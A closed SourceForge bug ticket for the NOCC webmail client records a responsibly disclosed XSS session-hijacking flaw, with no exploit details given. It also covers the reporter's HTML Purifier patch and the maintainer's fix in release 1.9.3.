Menu

#399 Session Hijacking with Cross Site Scripting

Reproducible
closed-fixed
Security (3)
9
2012-06-18
2012-05-02
No

By sending a mail containing some well formated code, Session Hijacking is possible.
As this Issue is really serios, I will inform Tim Gerundt and send Details by email directly.

Details will be given, as soon as this security Issue is fixed.

Discussion

  • Gunnar Haslinger

    • priority: 5 --> 9
    • assigned_to: nobody --> gerundt
     
  • Gunnar Haslinger

    Patch for removing XSS Vulnerability with htmlpurifier

     
  • Gunnar Haslinger

    I wrote a Patch adressing this vulnerability.
    It depends on htmlpurifier which can be downloaded from http://htmlpurifier.org/releases/htmlpurifier-4.4.0.zip

    1. Directory "library/HTMLPurifier" (and subdirectories) out from the htmlpurifier-4.4.0.zip File has to be inserted into the nocc-webmailer Directory

    2. Take the patched action.php out of my ZIP File patch.zip and overwrite the original one from nocc

    3. Take the patched functions.php out of my ZIP File patch.zip and overwrite the original one (located in folder utils).

    The unpatched Versions (extension ".original") are included too, so that you can check my changes making a diff.

     
  • Tim Gerundt

    Tim Gerundt - 2012-05-28
    • status: open --> open-accepted
     
  • Gunnar Haslinger

    Works in my tests too.
    Looks fine.

     
  • Tim Gerundt

    Tim Gerundt - 2012-06-18

    I release NOCC 1.9.3 at the weekend, which include the fix:
    http://nocc.sourceforge.net/download/

     
  • Tim Gerundt

    Tim Gerundt - 2012-06-18

    Fixed in SVN.

    It'll be included in next release.

    But you can download daily snapshots at :
    http://nocc.sourceforge.net/download/

    Thanks for the bug report.

     
  • Tim Gerundt

    Tim Gerundt - 2012-06-18
    • status: open-accepted --> closed-fixed
     

Log in to post a comment.